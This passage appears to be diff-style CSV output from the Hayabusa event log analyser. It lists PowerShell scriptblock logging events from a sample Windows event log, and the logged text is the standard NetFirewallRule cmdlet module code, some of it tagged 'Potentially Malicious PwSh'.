$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${Associ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"atedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' -Alias '*' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Par",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"atedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' -Alias '*' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Par",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter)",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
